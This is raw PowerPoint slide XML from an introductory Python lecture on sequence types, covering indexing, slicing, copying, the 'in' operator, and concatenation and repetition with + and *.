            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>'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&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>""" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>multi-line</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>that uses triple quotes.”””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629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Access Sequence Types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78280"/>
            <a:ext cx="7772400" cy="507492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800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Access individual members of a tuple, list, or string using square bracket “array” notation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" i="1" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Note that all are 0 based… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0" i="1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  <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="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b="0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tu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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(23, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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en-US" sz="2000" b="0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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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, 4.56, (2,3), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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en-US" sz="2000" b="0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2000" b="0" dirty="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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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110000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="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b="0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tu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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[1]     # Second item in the tuple.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="0" err="1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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800" b="0" dirty="0" smtClean="0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  <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="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li = [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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, 34, 4.34, 23]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="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110000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="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li[1]      # Second item in the list.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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34</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800" b="0" dirty="0" smtClean="0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  <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="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b="0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st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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sz="2000" b="0" dirty="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“Hello World”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="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b="0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st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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[1]   # Second character in string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="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‘e’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430720" y="2703600"/>
              <a:ext cx="3618000" cy="294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4600" y="2701080"/>
                <a:ext cx="3626640" cy="30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261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Positive and Negative Indices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4953000"/>
          </a:xfrm>
        </p:spPr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en-US" b="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t = (23, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="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en-US" b="0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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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, 4.56, (2,3), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="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en-US" b="0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b="0" dirty="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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Positive index: count from the left, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="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starting with 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="28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t[1] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="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en-US" sz="2800" dirty="0" err="1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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="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’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128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en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Negative index: count from right, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="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starting with –1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF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400050" lvl="1" indent="0">
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="280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t[-3] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="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4.56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152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Slicing: Return Copy of a Subset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93520"/>
            <a:ext cx="7772400" cy="460248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en-US" b="0" i="1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i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de-DE" altLang="en-US" i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 = (23, 'abc', 4.56, (2,3), 'def')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0" i="1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120000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0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120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Return a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="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copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> of the container with a subset of the original members.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Start copying at the first index, and stop copying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" i="1" u="sng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before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> second.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Index starts at 0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="0" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0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en-US" sz="2800" i="1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i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t[1:4]	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0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en-US" sz="2800" i="1" dirty="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(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" i="1" dirty="0" err="1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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" i="1" dirty="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’, 4.56, (2,3))</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" i="1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en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Negative indices count from end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0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en-US" sz="2800" i="1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i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t[1:-1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0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en-US" sz="2800" i="1" dirty="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(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" i="1" dirty="0" err="1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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" i="1" dirty="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’, 4.56, (2,3))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3" name="Cloud Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3261360" y="3535680"/>
            <a:ext cx="3749040" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -64810"/>
              <a:gd name="adj2" fmla="val 300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Ends at 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> element, not including it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086920" y="1193040"/>
              <a:ext cx="5615280" cy="3868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84400" y="1190520"/>
                <a:ext cx="5622480" cy="387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739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anose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Slicing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="36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1960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b="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de-DE" altLang="en-US" i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 = (23, 'abc', 4.56, (2,3), 'def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="en-US" i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')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0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en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Omit first index to make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="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copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> starting from beginning of the container</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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en-US" sz="28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800" b="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t[:2] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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en-US" sz="2800" b="0" dirty="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(23, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" err="1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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="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’)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" b="0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en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Omit second index to make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0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copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> starting at first index and going to end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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en-US" sz="28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2800" b="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8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t[2:]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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en-US" sz="2800" b="0" dirty="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(4.56, (2,3), ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" err="1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2800" b="0" dirty="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’)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461960" y="1991520"/>
              <a:ext cx="5170680" cy="2218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9440" y="1987200"/>
                <a:ext cx="5176800" cy="222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152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Levels of Programming </a:t>
            </a:r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586" y="1484313"/>
            <a:ext cx="5904827" cy="4641850"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5929334" y="1212763"/>
            <a:ext cx="2637771" cy="1447872"/>
            <a:chOff x="5929334" y="1212763"/>
            <a:chExt cx="2637771" cy="1447872"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Down Arrow 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5168855">
              <a:off x="6524284" y="617813"/>
              <a:ext cx="1447872" cy="26377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21358911">
              <a:off x="6308803" y="1736642"/>
              <a:ext cx="174791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We are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357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Copying the Whole Sequence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107680" cy="4648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800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>[ : ] makes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> of an entire sequence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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en-US" sz="28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	&gt;&gt;&gt; t[:] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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en-US" sz="28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	(23, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0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abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="28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’, 4.56, (2,3), ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0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28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’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Note the difference between these two lines for mutable sequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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en-US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l2 = l1 # Both refer to 1 ref,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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en-US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 	       # changing one affects both</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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en-US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l2 = l1[:] # Independent copies, two refs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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en-US" sz="28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587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The ‘in’ Operator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7144"/>
            <a:ext cx="8229600" cy="499221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b="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Boolean test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>whether a value is inside a container:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="0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18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t = [1, 2, 4, 5]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18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3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="18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t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18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4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="18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t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18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4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean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not in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="18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t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</a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For strings, tests for substrings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2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a = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000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abcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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'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'c' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="18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a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'cd' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="18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a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'ac' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF66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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="18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a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</a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Be careful: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" i="1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in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> keyword is also used in the syntax of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" i="1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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="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b="0" i="1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loops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" i="1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list comprehensions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0" dirty="0" smtClean="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171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The + Operator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en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>The + operator produces a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" i="1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new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>  tuple, list, or string whose value is the concatenation of its arguments.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0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en-US" b="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(1, 2, 3) + (4, 5, 6)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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en-US" b="0" dirty="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(1, 2, 3, 4, 5, 6)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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en-US" b="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[1, 2, 3] + [4, 5, 6]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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en-US" b="0" dirty="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[1, 2, 3, 4, 5, 6]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0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en-US" b="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b="0" dirty="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“Hello” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="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“ ” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US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+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="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“World”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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en-US" b="0" dirty="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‘Hello World’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63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ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>The * Operator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0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>The * operator produces a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" i="1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new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> tuple, list, or string that “repeats” the original content.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 b="0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(1, 2, 3) * 3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dirty="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(1, 2, 3, 1, 2, 3, 1, 2, 3)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 b="0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[1, 2, 3] * 3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dirty="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[1, 2, 3, 1, 2, 3, 1, 2, 3]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 b="0" dirty="0" smtClean="0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b="0" dirty="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“Hello”</a:t>
            </a:r>
            <a:r>
